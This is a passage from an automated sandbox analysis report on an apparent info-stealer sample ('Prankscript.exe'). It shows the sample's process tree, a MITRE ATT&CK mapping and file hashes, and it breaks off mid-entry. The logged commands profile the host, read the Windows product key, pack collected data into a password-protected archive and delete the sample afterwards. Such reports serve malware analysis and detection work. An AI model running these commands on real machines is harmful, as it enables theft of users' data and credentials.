    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1804
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI43162\rar.exe a -r -hp"grabby" "C:\Users\Admin\AppData\Local\Temp\YcJrU.zip" *"
    3⤵
    PID:5008
  - - C:\Users\Admin\AppData\Local\Temp\_MEI43162\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI43162\rar.exe a -r -hp"grabby" "C:\Users\Admin\AppData\Local\Temp\YcJrU.zip" *
      4⤵
      Executes dropped EXE
      PID:1996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1572
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2940
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:124
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2464
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3152
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4608

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004C0 0x00000000000004B8
1⤵
PID:4784

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:2744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:1304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
74e4a39ae145a98de20041613220dfed

SHA1
ac5dd2331ae591d7d361e8947e1a8fba2c6bea12

SHA256
2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36

SHA512
96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
cbc9fc2d9ad2df85283109b48c8e6db0

SHA1
721ea0dfafd882d6354f8b0a35560425a60a8819

SHA256
7c21b286b304b2b42ab3502158aef04892b60c63007b8ed7172dad86a4bcebbe

SHA512
09594b5f33704cf367960376e5abc8cbfa7baead59c3f199ffd365a9a9c2159b45f6596d597ebdd033db5436c000faac3c5b2fb39e97fc17b102d03831265609

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
046b1cdbd636e82e7711ea1fde31d7e3

SHA1
f5fa4183cb259a99b4148ee957a5f76e80a77ada

SHA256
40328502d95af4c1db45d98abe8c4e9214d80a8df7f0b8f19f81edd5e121f90a

SHA512
460ba5792f0df64289ff4057d04615973a7844b2fd2c14df554600c141d720fcf13d9e9c8449ac57e50fa074a81887437918970881b4d48f7a7ee3521bac8eb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000072

Filesize
51KB

MD5
32aaa2c79e0b335130cfb804de2d071e

SHA1
fc4a04bcbdd9938aec1d53df488999d7cb8829fa

SHA256
f6fb6cfd2637df7e21c4505ebdb9bc988ba9b2c9408c78bbc90d8856a916217f

SHA512
c4ec33f7f1a9da6bf825aa3dc71bba3757b0e24ca0836987a22f2377f90a578c4445873e12989ccee6fe051dc455e255253edca96e1405fcde3c9ff7fba30af0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000075

Filesize
247KB

MD5
40e9811a8168875f77a707d6da71e710

SHA1
2569cd0466c78adbb50a84afe72ae01ad02c973b

SHA256
6706201df31ba0673e0127f2af04b452bf025fe2a97574ea187031e98b3970f6

SHA512
4106c497171570a999f69ce807c9dc75fa5ca5d2fff67a4f82fc4c6531c4591e39330bd761c03249967056507249605991c7793e519c8d39a1bd2fd5d68ffca2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008c

Filesize
21KB

MD5
0da138aa9b07f931de86caad5a65dd4a

SHA1
2a9540394ae9abed64966e6cb26a7b7018eb78c3

SHA256
88476ceb7e9aae5896649d47e93c76d5e4ab9638d86511571c5d890043764b4b

SHA512
7f28631f584e6122459032e08e692c0bcc2dd06742ea1403c16ee933b0c8aa31363374790c9c191a83968da64f5aa24b6456769e7884fcf6bd17cfe6f7662b8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008f

Filesize
29KB

MD5
fe36946148c67b4c99e12afab305ab93

SHA1
bf64163a495d386740c3089f7b4eb6c6e4a5e88f

SHA256
46ba1111d95d25b4b563fb7418bc62bbcb7ff8e909e6e41af1fc1bd136606374

SHA512
ef741f5ca26bf66a515789086b7d8b5ab88c0cb466f741e216a0539da0bad1f956a392be1439c5a2ec91885e5af0ebbc972b0657e4077f830256bed1bf9d45b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
cb20eca5de6f54751da220c29f0866d7

SHA1
a9bd8dfdf68fe1f9d315a239b00f4746e7f2513d

SHA256
c132384e505f3bade581bb2d6b6711b8866c22fdaa249c611e9e18b776f3a618

SHA512
211d6b57a69702d3183ed81c5787f2b3f92f415ef2ba06e35dc99fab32b8154c9733f93416ad9d80d768ea08eaba3ee68f2e0c3e124630d11f1573f7a5ed8bbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe5913cc.TMP

Filesize
3KB

MD5
6b47c7098ba079bf24af33f433369bb6

SHA1
70f92775a7b8dca3806f9ef5af45a5724d8a5e6f

SHA256
e273ea05c83bb56474dd2b4bb3f5c03540929d16cd7f8df6157c1f590215e328

SHA512
5f3295c49afc83380b4e8353e120f15909efc1abf7645b3ba6ce17a2a08e23271c5ecb1bbcf8d57e5d402b2a08fb95b8b24e258895d47089275fcc553d50cdb8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
69KB

MD5
164a788f50529fc93a6077e50675c617

SHA1
c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48

SHA256
b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17

SHA512
ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\content.js

Filesize
9KB

MD5
3d20584f7f6c8eac79e17cca4207fb79

SHA1
3c16dcc27ae52431c8cdd92fbaab0341524d3092

SHA256
0d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643

SHA512
315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

Filesize
107KB

MD5
40e2018187b61af5be8caf035fb72882

SHA1
72a0b7bcb454b6b727bf90da35879b3e9a70621e

SHA256
b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5

SHA512
a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000003.log

Filesize
210KB

MD5
255749a3a0b6b37f03ae7106cf992197

SHA1
85146d2309495fe1f632cc398631eb897bf50195

SHA256
4e53530d6364d121ff781af5eb7c19c13d6dc3194e8ca1c49254c208ad183472

SHA512
06e610525675293450d984df92fa89a0056af37f7e0e1469782d03d26430f97fd0875be1c5881bd5e2055f681203504bc05e9a6129e08039339e03b9b5691881

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\LOG

Filesize
351B

MD5
4a2d50fd4d7a2c503bc41d24f957d8c3

SHA1
95f94ad40bc7e69a10cf0f28d905f1d1360e343d

SHA256
399c5abe82e90565fa308306f1e7af017817d966e7c8bbdfb2b57831617108ac

SHA512
f15da133566218e54257f2a3ca9e3f3976bd7cd059e2e077ca47f1991d9954f50eb8aa432fb87855bcb99fc25ee23e95aa78e595fc256114da9fecf617b20ddb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\MANIFEST-000001

Filesize
23B

MD5
3fd11ff447c1ee23538dc4d9724427a3

SHA1
1335e6f71cc4e3cf7025233523b4760f8893e9c9

SHA256
720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

SHA512
10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
15KB

MD5
12222cf5dff43e73f5e179ea4f7dc76e

SHA1
c83d8e615d569b77d28adec8f9d3e3d6ec226982

SHA256
f6a475b701cec8ec48ec8c6f44d4f12b1c9d1d7a4bbc3cd051e56310c8f1eb1b

SHA512
a43a2fbcc4e6e470f065e46eab054d10b825e2f64ba2b1bd61fdabdced712256b7e346b192e104c19e456e22a9c416e1c0579edd7cb9c0d9159156035018c3d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
37KB

MD5
f1b9b6e157ec51f6773ac73c2d7eb6ad

SHA1
bfcbaa6a1d4a12e90ce6158f993ee8962eeeca0d

SHA256
0c44d35e6e8ac52d1d4c552a0c4a71bf726dfc2f47d10a77d5d661723b0ca876

SHA512
a0f4426a4b648031027db83c2e15a7f4363d135efbfdbdd0c73638ab2a0efe13d295e4628144aef7c6ff39af5ac0a01ca373e13a910ea4c0c11b920f25cfa0c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\02484094-3055-48bc-82c4-e09bf4017e0f\index-dir\the-real-index

Filesize
2KB

MD5
771319aba1797a5b5633a33fa68333b7

SHA1
d842c8ad57d05fef154cd7a8233d5bea9a92b53e

SHA256
dda927d3107e4937ad792273732e10fa536e60cb4440e6e27c8b59b6587a2a0d

SHA512
719838894c26bced5f263bbaaea255cbf2e3108ed69204d78680d04fff7ad2d032a101516c55d7d728ddec9475a6a0b018d17a28fa2070a058cc2397fa6ce7f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\02484094-3055-48bc-82c4-e09bf4017e0f\index-dir\the-real-index

Filesize
2KB

MD5
d3ee878c9c002bfde3aec271d842a368

SHA1
d32e96fcc9a649ebcd2937d8dbcd8943629c3088

SHA256
20fdd08200399634f80ca47c8b40dbf9a29f547c9133935a15899db1be2696d4

SHA512
be31bcb17b51238dd769bbb2c7f28f311304f2d7398042261852f71a4b32c13f3e45ba9fc7774597db9aa0c0bbc33dc0e4e3f8c47c4f798fdf30f0f703b78c19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\02484094-3055-48bc-82c4-e09bf4017e0f\index-dir\the-real-index~RFe58bbd9.TMP

Filesize
48B

MD5
9b158afce048115ec9ac8f577e54886f

SHA1
182636830953390244c3cbed51766cd6db90bd8a

SHA256
2c1c8f70f535f5f01112ae165cc71c13f6efeafe065a2ba6815fa64a4efe1b89

SHA512
107ffd736eb609238617aa61a839207079156bd2f580431cd132a10f082611943673f2f7524782234bd9db2252004ba6cb125491a3832e6473427835519cdbbd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\54e462d2-99f1-4552-8753-64de6b11cf2e\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\e49d39a1-088f-4956-b184-d656a98d39c9\index-dir\the-real-index

Filesize
576B

MD5
0996f0e6c42e78319319688897f0c1b1

SHA1
08b3c407589e9df8747aef430aa4c891e6e6cbd1

SHA256
fc45c2006e83b7d4c6618022118e7ad9a2a9cc1828695a57cab6c8810cd42a9d

SHA512
9aa2b47a4cecba1fc812a65321acc1e3b4ce1e36766b20d34c7b91b5744db48327a0b01c7c132ba4eeaddb58858accd0ac26fe5640f462791530601e242c1788

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\e49d39a1-088f-4956-b184-d656a98d39c9\index-dir\the-real-index~RFe591e6b.TMP

Filesize
48B

MD5
8fc908d3fa335bd9bf52e5c3c2d5d6c4

SHA1
dbfe74940f87536e8515476b2823422d869e01ac

SHA256
dde7e87e7cc59832197764bb9f7e68f73a6fbf681fd4f82113bcfd10e89ee7ea

SHA512
ddad15741b639fb39f1ed063654604ae5c4d47aa65d36b68abdd9fc377496c2494a5dd0f22925d4d92a55fe6166719c11858c7736ca338407e140c3488b6d35f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
266B

MD5
f09183fbfbe5eca52cf35819bbc03a10

SHA1
157a95166eaad4ae0dd6087b59d669635e9b6720

SHA256
fa4a6b77442f6098bed2a6623618ba0297f4309c5d711185cfbf63ddf22ceb84

SHA512
4adf857523d89510c5f57e04313b8fd442dfcd76897580725896e81872602b9bcf9897b3700cc016d8fbf3a628c5032107cf7f21e9333dc9ca200474b58bc8a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
257B

MD5
0151732a034860e57cb2d8fd575f77d9

SHA1
f60e46d596ba41594338fe3aae1e61b7a602683d

SHA256
6b612015681954c0cabf0fe1f8561b7bf9971fed602771269a50b0e30171cdf2

SHA512
003484b6b2ebf0a8acc54cff5a8f84a82075e521e9a64e45c50dda7408f931ce0e061fda66e63d38fea0862fed68cf45d62e9d05ac97ca70af6f32c03fec3c85

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
193B

MD5
9469af6842d36e3ea667debfae75b9bb

SHA1
29c0a6535c5cacdd26881591daa3e3e04f7d4f11

SHA256
69f1868ebb32e710f5ee969bd5b2f666bfafe9df4b098155dcc2cb6004f96486

SHA512
2c4dca60fd8d37d8abd37902115c7a04b8b8c28d620cd0ea19c01776c2adcfd18a4f2c1e63c9cf1c44c40a243560bda068a18c5264203a75aed0ebee4d0fd236

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
279B

MD5
7de9c87bcb1a2fc9f55bb55887ec055f

SHA1
b3ac5f6348e39c8b6d8d27cb5c251f7c2e7c1cff

SHA256
40ebbc0875b87d854baaf219fdd6564d85ec5b8d4bdecae13450b0e5b792cb13

SHA512
c46c58c0e20251259d545485a6ff559e44ceadd6625ba0f1155a61bac9dff0a216e3018f41e599cfcbfa896e23844f4f112d22bf1ffef6e7433bdd6ee7c2b047

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
193B

MD5
8529baa465c89446879cbab688b8fba2

SHA1
db4615eb554cb3b80791afbaf94f220d36707e55

SHA256
43cf8b82f07bba7fc4bb449b3786df17ee21b2e3706ea0f3918a960e714cb34f

SHA512
f4d5e7c80b4e0b667c9a56243db8153a401c766eb7518f71951908ae2e284698625917083919e90e2c8568c18e0b498f7ac48a76c8845f4c8cb72e26f7c1e508

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
112B

MD5
8dd0ad1286670b2f8463bacc9970932c

SHA1
be3ecca03407acdcfe2fd19124b34e3e2eac644a

SHA256
d06424a5a163324918a47883197a48d28f24cfe8a88f33a5e11e090d1e57d2f8

SHA512
c713f5c4871f0b3af59bdc91c4eaa8c70e8d8636199a782d4ef45ccb903ee87657a4e81048131aae998c4de1357438cfc4bcddfa11932680ede74238d752f349

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
198B

MD5
e2bd750d2de3f9c94436f3e569871496

SHA1
a5ff91fa5a6cc13b1032fe1a4abc3ee3c942765e

SHA256
1b6a63a8fdebc7af67270187ad332013fe42f5ed7399bc3660077a8ee93fa093

SHA512
143b87f7015d87cbb7ad2cb9efcdd2521b61d1144f95c3657cdcb1b30e91411c86069f549cf10366278bce2ce3202cfcf352e091f889056db6bb9444bc7797d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
176B

MD5
3760af8402dbab3c036936d9202f0574

SHA1
820fbec183f65394032923ae74b724409a3bc6c2

SHA256
1ce9ac3c801b00298f426fdbdfc937d36aa259e94545ace6e2662f592f09e511

SHA512
29bca70d7fd0f9322c81fb8995b79936334490bd7020525e0cc1ddaba762506353e13f94628b21a4906a66c5043bc7b166baa583ab43ba224ac53ad91a0fb9e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
262B

MD5
ad393a19f8abbf238639a477ed51d070

SHA1
ee61f05d16ce2ae79845ee05fd46093f72b253f9

SHA256
07a00b8a546ba9b51b5ebb518341dabcadd5d1e9746c6f57f09a012d9ae3e9e9

SHA512
a27f3f62332e8e7c4d90bddc0a074d12d165ab95482513eaf4671618a6a0c2ba0df3b16ee4dde170190e477401a1eeb51194e9aac7ee09b4b774f990f61d0e51

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
262B

MD5
d6e0ec047e796b1b5678389f60606076

SHA1
e3819cff5aee77abe6a5cb8829d4377c8130525c

SHA256
832ed0d416a10aee802b1a7e634902db4590a6b5d677eddcf726861976d803b4

SHA512
65578712177e3201f7d041fef7a1e0d25e5cb042f06092dc661b11deae477f5180e67e42b0d304243c64eca7dc7184d28e4ff67fc7a44cce18642fe1abed00ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe58a757.TMP

Filesize
119B

MD5
f9c6d8363fd07d334e836cfef7d48b4f

SHA1
f52798e9f3a564c94ea8e1bdbe61f7fe6aa2961c

SHA256
533eb20c6f0f577601076cb1483a584179813c57294f196fea4fa4fff3edbe18

SHA512
0c3ac60c212ce1df45eb4b527e823ffc043edae6f3e4d8cd195b789459019c90c71d7bfcccb63ebe209a6ce9fb970beef1bb46f433b8021d9140449efeb02212

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
31f0335b0e97f99f579b1fbe39dc5fe5

SHA1
05431f818bb5928fdbda49108d261f681cfb30d6

SHA256
64374f2fffb81802cda1c44f1ccb4a50a5b1a4e1131326b810b8898e7f307fc1

SHA512
d4cff5a28d45ac19085565ede9b8f060b31f08afcc512062816c46f1d1e4881ad9b7ff1e340436477f7491dca06de1bc1d6375fbcc51a9584d15d09e068db9a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe591478.TMP

Filesize
48B

MD5
6ac21c79fb100f90f0de6304e3d907a5

SHA1
01e8a9abd070a031c1924cd475e6a55f02894132

SHA256
651d7fcd2663105ea220fe2627e75b0dcac1be22dee81edcc902ad19fb58ac4a

SHA512
f32fd78fe83485e20d16f3d19e98dd764ca6561c7829a9cfbbc176705a6c184dc0e21d89ce7281cf79dfd3cc3be08168745ace80703a74dbb9a5ab421ee08871

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\favorites_diagnostic.log

Filesize
1KB

MD5
d7956c056b2546a951b8330394433894

SHA1
8fdcdf1a257d68a0e4e2c9e120e7b205111d6e6d

SHA256
0d41c89ce3a69c9f690fed17985340c4c11f493774684a851796a0a81506d64d

SHA512
8c17643b0e0ea5916857cd1113b4526c4a94cf6008c056bafc5973a2ac8e6d40dcb6e493753b42277b67025724617a1927312074533fc45a1727dc4b2f577d98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
22KB

MD5
0e0b49c76b061e0561d5b076b1fc0108

SHA1
43999ff9eaa0083d251ab06186af2d1cad2e22dc

SHA256
4f881e08d1f23dca327d6c0eff44483dc0d1f5a1da019571372ce36b481543fa

SHA512
1b919a43049655f565356e2572ad1f0891aad08c10cccf52f58d13d796749987b4575eae1cea2701747c61d1858024a0efb99a7af6b1a99ab30a716bb9f34337

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
872B

MD5
246dff5ffae06fbad4b7ab1332e818c8

SHA1
f88b15cf95a1cc5d4aff157c28bd6dfe62808d9a

SHA256
882f47e209573e2fdf24bf075c814930ee5999600277f206f7eb5144fadf967c

SHA512
33fe8482f66ea0d1562b80f682366a6b7b23b5a17339027597c45a85357ae463f11dc781e98648feefae58f66dca24b80e63c7241f82651b1c8dfcfb632db5da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog~RFe5986e9.TMP

Filesize
465B

MD5
fb6d7c4d1363d2c33f3770e8ace3e4c3

SHA1
24f126d86ed6e9219f4b467dc50281cfe2717615

SHA256
85c534f950606c4bde5e62cca2d40fd058297eaef665aabff58c5b950a50de8f

SHA512
9c6c94d72b4e89251d1a42b9774e8bcf15b0287afaf5d0843b846d106d47eb97ce67109645d738b72c6df3aa5051fe43b9af5db374d42f6e26b5434e14d9007a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\f3edf6f3-31c5-439c-88c9-60a227820b3c.tmp

Filesize
21KB

MD5
e4dfd0504387a1ebcc4a48846e44a23e

SHA1
a5a91da421e3d8728ae857694dbeb24ea72b7866

SHA256
d3c39babd9652bcdb02ae17f895437ed85f617cb04f7ba4bbaf7ad7e8ab78cb6

SHA512
94a1d4ab7b18763b55c9246d73feb0ed64a7e506572884a2940696b12910d6ff2a03a0b1aca3e4035a81548633acd437e762e758952ba72dafc97f191e46d419

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
30KB

MD5
108a200444c8c8a5d3f34883c0190854

SHA1
e0289c4bdd12d2fd82fe30ec99626d010ad2e433

SHA256
1872dca70495e36a525e17b0219173aab0574cc0c94fd67ffdd2ee4b8510dca1

SHA512
adf5dee9f588b78151acd0365e64845732b794610f7f15dfce6225e5955d6102ded550e8fa3dc4e92903ff48f5490468fdb53e9085c79d0a95ea0d6b6a5dcb8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
7KB

MD5
b5b7eb72d2db8bd4144922b2781171b0

SHA1
d56d85ee40b4404a9bab6815739cfcc308c4fa7d

SHA256
